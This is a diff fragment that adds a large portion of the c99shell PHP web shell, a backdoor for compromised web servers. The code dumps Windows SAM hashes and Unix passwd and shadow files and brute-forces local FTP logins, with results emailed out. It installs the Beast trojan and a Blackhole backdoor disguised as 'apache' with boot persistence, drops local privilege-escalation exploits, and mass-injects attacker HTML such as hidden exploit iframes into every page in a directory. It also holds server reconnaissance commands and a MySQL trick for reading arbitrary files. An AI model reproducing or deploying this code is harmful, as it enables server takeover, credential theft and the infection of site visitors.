+       echo "<td>".$row["Update_time"]."</td>"; 
+       echo "<td>".$size."</td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
+       echo "</tr>"; 
+       $i++; 
+      } 
+      echo "<tr bgcolor=\"000000\">"; 
+      echo "<td><center><b>+</b></center></td>"; 
+      echo "<td><center><b>".$i." table(s)</b></center></td>"; 
+      echo "<td><b>".$trows."</b></td>"; 
+      echo "<td>".$row[1]."</td>"; 
+      echo "<td>".$row[10]."</td>"; 
+      echo "<td>".$row[11]."</td>"; 
+      echo "<td><b>".view_size($tsize)."</b></td>"; 
+      echo "<td></td>"; 
+      echo "</tr>"; 
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"tbldrop\">Drop</option>"; 
+      echo "<option value=\"tblempty\">Empty</option>"; 
+      echo "<option value=\"tbldump\">Dump</option>"; 
+      echo "<option value=\"tblcheck\">Check table</option>"; 
+      echo "<option value=\"tbloptimize\">Optimize table</option>"; 
+      echo "<option value=\"tblrepair\">Repair table</option>"; 
+      echo "<option value=\"tblanalyze\">Analyze table</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+      mysql_free_result($result); 
+     } 
+    } 
+   } 
+   } 
+  } 
+  else 
+  { 
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
+   if (!empty($sql_act)) 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if ($sql_act == "newdb") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+    } 
+    if ($sql_act == "serverstatus") 
+    { 
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "servervars") 
+    { 
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "processes") 
+    { 
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "getfile") 
+    { 
+     $tmpdb = $sql_login."_tmpdb"; 
+     $select = mysql_select_db($tmpdb); 
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
+     if ($select) 
+     { 
+      $created = FALSE; 
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
+      $result = mysql_query("SELECT * FROM tmp_file;"); 
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
+      else 
+      { 
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
+       mysql_free_result($result); 
+       mysql_query("DROP TABLE tmp_file;"); 
+      } 
+     } 
+     mysql_drop_db($tmpdb); //comment it if you want to leave database 
+    } 
+   } 
+  } 
+ } 
+ echo "</td></tr></table>"; 
+ if ($sql_sock) 
+ { 
+  $affected = @mysql_affected_rows($sql_sock); 
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
+ } 
+ echo "</table>"; 
+}
+if ($act == 'grablogins') {
+	if ($win) {
+		echo '<b>Grab Windows Logins:</b><br><br>';
+		if (file_exists($_SERVER['WINDIR'])) {
+			echo 'Download backup SAM file: <a href="'.$surl.'act=f&f=sam&ft=download&d='.$_SERVER["WINDIR"].'\repair\"><b>'.$_SERVER['WINDIR'].'\repair\SAM</b></a><br><br>';
+		} else {
+			echo 'There\'s no backup SAM file!';
+		}
+		echo '<a href="'.$surl.'act=grablogins&dumphashes=samdump"><b>Execute SAMDUMP</b></a><br><br>';
+		if ($_GET['dumphashes'] == 'samdump') {
+			if (is_writable('.')) {
+				cf('samdump.exe', $samdump);
+				exec('samdump.exe '.$_SERVER['WINDIR'].'\repair\sam', $blah);
+				echo '<textarea cols=175 rows=10>';
+				foreach ($blah as $samline)
+					echo htmlentities($samline)."\n";
+				echo '</textarea><br><br>';
+				if (file_exists('samdump.exe'))
+					unlink('samdump.exe');
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if samdump was called
+		echo '<a href="'.$surl.'act=grablogins&dumphashes=pwdump2"><b>Execute PWDUMP2</b></a><br><br>';
+		if ($_GET['dumphashes'] == 'pwdump2') {
+			if (is_writable('.')) {
+				cf('pwdump2.exe', $pwdump2);
+				cf('samdump.dll', $samdumpdll);
+				exec('pwdump2.exe', $blah);
+				echo '<textarea cols=175 rows=10>';
+				if ($blah) {
+					foreach ($blah as $samline)
+						echo htmlentities($samline)."\n";
+				} else {
+					echo 'Couldn\'t get hashes!';
+				}
+				echo '</textarea><br><br>';
+				if (file_exists('pwdump2.exe'))
+					unlink('pwdump2.exe');
+				if (file_exists('samdump.dll'))
+					unlink('samdump.dll');
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if pwdump2 was called
+
+	} else { // if not windows
+		echo '<b>Grab *nix Logins:</b><br><br>';
+		if (file_exists('/etc/passwd'))
+			echo 'Download passwd: <a href="'.$surl.'act=f&f=passwd&ft=download&d=/etc/"><b>/etc/passwd</b>';
+		if (file_exists('/etc/master.passwd'))
+			echo 'Download master.passwd: <a href="'.$surl.'act=f&f=master.passwd&ft=download&d=/etc/"><b>/etc/master.passwd</b> <- 1% chance you can view this';
+		if (file_exists('/etc/shadow'))
+			echo 'Download shadow: <a href="'.$surl.'act=f&f=shadow&ft=download&d=/etc/"><b>/etc/shadow</b> <- 1% chance you can view this';
+	}
+}
+if ($act == "mkdir") 
+{ 
+ if ($mkdir != $d) 
+ { 
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
+  echo "<br><br>"; 
+ } 
+ $act = $dspact = "ls"; 
+} 
+if ($act == "ftpquickbrute") 
+{ 
+ echo "<b>Ftp Quick brute:</b><br>"; 
+ if (!win) {echo "This function does not work in Windows!<br><br>";} 
+ else 
+ { 
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
+  { 
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
+   else {$TRUE = TRUE;} 
+   if ($TRUE) 
+   { 
+    $sock = @ftp_connect($host,$port,$timeout); 
+    if (@ftp_login($sock,$login,$pass)) 
+    { 
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
+     ob_flush(); 
+     return TRUE; 
+    } 
+   } 
+  } 
+  if (!empty($submit)) 
+  { 
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
+   $fp = fopen("/etc/passwd","r"); 
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
+   else 
+   { 
+    if ($fqb_logging) 
+    { 
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
+     else {$fqb_logfp = FALSE;} 
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    } 
+    ob_flush(); 
+    $i = $success = 0; 
+    $ftpquick_st = getmicrotime(); 
+    while(!feof($fp)) 
+    { 
+     $str = explode(":",fgets($fp,2048)); 
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
+     { 
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+      $success++; 
+      ob_flush(); 
+     } 
+     if ($i > $fqb_lenght) {break;} 
+     $i++; 
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
+    fclose($fqb_logfp); 
+   } 
+  } 
+  else 
+  { 
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
+  } 
+ } 
+} 
+if ($act == 'd')
+{ 
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
+ else 
+ { 
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
+  if (!$win) 
+  { 
+   echo "<tr><td><b>Owner/Group</b></td><td> "; 
+   $ow = posix_getpwuid(fileowner($d)); 
+   $gr = posix_getgrgid(filegroup($d)); 
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
+  } 
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
+ } 
+} 
+if ($act == 'phpinfo') {@ob_clean(); phpinfo(); c99shexit();} 
+
+if ($act == 'trojan') {
+echo '<b>Install Trojan Server:</b><br><br>';
+	if ($win) {
+		echo 'Please keep in mind that these are <u>not</u> undetectable trojans.  Any decent anti-virus will pick them up, and they take no action to bypass firewalls or routers.  Use at your own risk.<br><br>';
+?>
+<form action="<?php echo $surl; ?>" method=GET>
+Choose Trojan: <select name="choosetrojan">
+<option value="beast">Beast v2.07</option>
+</select>
+<input type=hidden name="act" value="trojan">
+<input type=submit value="Install Server">
+</form>
+<?php
+		$choosetrojan = $_GET['choosetrojan'];
+		if ($choosetrojan == 'beast') {
+			if (is_writable('.')) {
+				cf('server.exe', $beast);
+				exec('server.exe');
+				echo 'Beast trojan server is running on port 6666 with no password.<br>';
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if beast was called
+} else { // if not windows
+?>
+<b>Install Backdoor:</b><br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+Choose Backdoor: <select name="choosebackdoor">
+<option value="blackhole">Blackhole</option>
+</select>
+<input type=hidden name="act" value="trojan">
+<input type=submit value="Install Server">
+</form>
+<?php
+		$choosebackdoor = $_GET['choosebackdoor'];
+		if ($choosebackdoor == 'blackhole') {
+			if (is_writable('.')) {
+				cf('apache', $blackhole);
+				echo 'Blackhole is _not_ running.  Go to the shell and run it yourself.  Here\'s the example from the readme:<br><pre>   # ./backhole &
+   i.e. # mv backhole /some/path/fakemail
+        # chmod 4770 /path/to/fakemail
+        # echo "/path/to/fakemail &" >> /etc/rc.d/rc.local
+        # /path/to/fakemail &</pre>Blackhole is configured to run under the process name \'apache\' on port 6875.<br>';
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if beast was called
+
+
+	} // end if windows/unix
+} // end if trojan was called
+
+if ($act == 'exploits') {
+?>
+<b>Exploits:</b>
+<br><br>
+All exploits are pre-compiled.  Just follow the directions.
+<br><br>
+<a href="<?php echo $surl; ?>act=exploits&sploit=h00lyshit">h00lyshit - Local Race Exploit</a>
+<?php
+		if ($_GET['sploit'] == 'h00lyshit') {
+			if (is_writable('.')) {
+				cf('h00lyshit', $h00lyshit);
+				echo htmlentities('h00lyshit was created in the script directory.  Now go find/make a 100mb file and execute "./h00lyshit <path_to_100mb_file>".');
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if h00lyshit was called
+?>
+<br><br>
+<a href="<?php echo $surl; ?>act=exploits&sploit=raptorchown">raptor_chown - Group Modification Exploit</a>
+<?php
+		if ($_GET['sploit'] == 'raptorchown') {
+			if (is_writable('.')) {
+				cf('raptor_chown', $raptorchown);
+				echo htmlentities('raptor_chown was created in the script directory.  Now execute "./raptor_chown <path_to_file_you_want_to_edit_group_of>".');
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if raptor_chown was called
+
+
+} // end if exploits is called
+if ($act == 'massbrowsersploit') {
+?>
+<b>Mass Code Injection:</b><br><br>
+Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.<br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+<input type=hidden name="masssploit" value="goahead">
+<input type=hidden name="act" value="massbrowsersploit">
+<table border=0>
+<tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"> <-- default is dir this shell is in</td></tr>
+<tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<IFRAME src="http://www.google.com" width=0 height=0 frameborder=0></IFRAME>'); ?></textarea> <-- best bet would be to include an invisible iframe of browser exploits</td></tr>
+<tr><td><input type=submit value="Inject Code"></td></tr>
+</table>
+</form>
+<?php
+if ($_GET['masssploit'] == 'goahead') {
+	if (is_dir($_GET['pathtomass'])) {
+		$lolinject = $_GET['injectthis'];
+		foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) {
+			$fp=fopen($injectj00,"a+");
+			if (fputs($fp,$lolinject)){
+				echo $injectj00.' was injected<br>';
+			} else {
+				echo '<font color=red>failed to inject '.$injectj00.'</font>';
+			}
+		}
+		foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) {
+			$fp=fopen($injectj00,"a+");
+			if (fputs($fp,$lolinject)){
+				echo $injectj00.' was injected<br>';
+			} else {
+				echo '<font color=red>failed to inject '.$injectj00.'</font>';
+			}
+		}
+		foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) {
+			$fp=fopen($injectj00,"a+");
+			if (fputs($fp,$lolinject)){
+				echo $injectj00.' was injected<br>';
+			} else {
+				echo '<font color=red>failed to inject '.$injectj00.'</font>';
+			}
+		}
+	} else { //end if inputted dir is real -- if not, show an ugly red error
+		echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>';
+	} // end if inputted dir is real, for real this time
+} // end if confirmation to mass sploit is go
+} // end if massbrowsersploit is called
+
+if ($act == 'security')
+{ 
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
+ if (!$win) 
+ { 
+  if ($nixpasswd) 
+  { 
+   if ($nixpasswd == 1) {$nixpasswd = 0;} 
+   echo "<b>*nix /etc/passwd:</b><br>"; 
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
+   $i = $nixpwd_s; 
+   while ($i < $nixpwd_e) 
+   { 
+    $uid = posix_getpwuid($i); 
+    if ($uid) 
+    { 
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
+     echo join(":",$uid)."<br>"; 
+    } 
+    $i++; 
+   } 
+  } 
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
+ displaysecinfo("RAM",myshellexec("free -m")); 
+ displaysecinfo("HDD space",myshellexec("df -h")); 
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
+ displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
+ displaysecinfo("Is links installed?",myshellexec("which links")); 
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
+ displaysecinfo("Is GET installed?",myshellexec("which GET")); 
+ displaysecinfo("Is perl installed?",myshellexec("which perl")); 
+ displaysecinfo("Where is apache",myshellexec("whereis apache")); 
+ displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
+ } 
+ else
+ {
+exec('systeminfo', $wininfo);
+?>
+<br>DOS command: <b>systeminfo</b><br>
+<textarea cols=125 rows=<?php echo count($wininfo); ?>><?php
+if ($wininfo) {
+	foreach($wininfo as $row)
+		echo $row."\n";
+} else { // if systeminfo failed
+	echo 'Couldn\'t execute command!';
+}
+?>
+</textarea>
+<?php
+ }
+
+} 
+if ($act == 'mkfile') 
+{ 
+ if ($mkfile != $d) 
+ { 
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
+  elseif (!fopen($mkfile,'w')) {echo '<b>Make File "'.htmlspecialchars($mkfile).'"</b>: access denied';} 
+  else {$act = 'f'; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
+ } 
+ else {$act = $dspact = 'ls';} 
+} 
+if ($act == 'encoder')
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></form>"; 
+
+?>
+</center>
+<br><br>
+<table border=0 align=center cellpadding=4>
+<tr><td>
+<center><b>Search milw0rm for MD5 hash</b></center>
+</td><td>
+<center><b>Search md5encryption.com for MD5 or SHA1 hash</b></center>
+</td><td>
+<center><b>Search CsTeam for MD5 hash</b></center>
+</td></tr>
+<tr><td>
+<center>
+<form target="_blank" action="http://www.milw0rm.com/cracker/search.php" method=POST>
+<input type=text size=40 name=hash> <input type=submit value="Submit"></form>
+</center>
+</td><td>
+<center>
+<form target="_blank" action="http://www.md5encryption.com/?mod=decrypt" method=POST>
+<input type=text size=40 name=hash2word> <input type=submit value="Submit"></form>
+</center>
+</td><td>
+<center>
+<form target="_blank" action="http://www.csthis.com/md5/index.php" method=POST>
+<input type=text size=40 name=h> <input type=submit value="Submit"></form>
+</center>
+</td></tr>
+</table>
+<br>
+<center>
+<b>Wordlist Hash Cracker</b><br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+<input type=hidden name="act" value="encoder">
+<input type=hidden name="d" value="<?php echo $d; ?>">
